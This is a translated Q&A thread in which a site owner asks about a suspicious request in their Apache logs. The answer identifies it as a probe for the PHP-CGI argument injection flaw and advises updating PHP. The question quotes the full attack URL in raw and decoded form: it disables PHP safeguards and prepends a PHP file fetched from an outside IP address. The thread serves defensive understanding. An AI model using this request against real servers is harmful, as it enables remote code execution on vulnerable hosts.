/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt
很多这些都在我的apache日志中创建了404,它看起来像是一个PHP黑客企图?
答案 0 :(得分:4)
对我而言,它确实看起来像是黑客攻击。
来自PHP Release Announcement page
某些系统支持向CGI脚本提供字符串数组的方法。这仅用于“索引”查询的情况。这是由“GET”或“HEAD”HTTP请求标识的,其URL搜索字符串不包含任何未编码的=字符。
URL解码的查询字符串如下所示:
/index.php?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://61.19.253.26/echo.txt
这些都是-d个开关,用于定义php.ini指令。基本上,这就是它的变化:
safe_mode=off
disable_functions=null
allow_url_fopen=on
allow_url_include=on
最后,有auto_prepend_file=http://61.19.253.26/echo.txt - 该指令包含位于http://61.19.253.26/echo.txt的PHP代码,并在index.php中的代码之前执行。
echo.txt托管在泰国某处的网络服务器上,并包含<?php echo "dsfer34w5rlsidfosdedfpsd"; ?>。这可能用于检查您的服务器是否容易受到攻击。
如果您使用Apache mod_cgi / mod_cgid在5.4.3之前运行PHP版本而在5.4.3之前运行5.4.x 立即更新:{{3} }
答案 1 :(得分:1)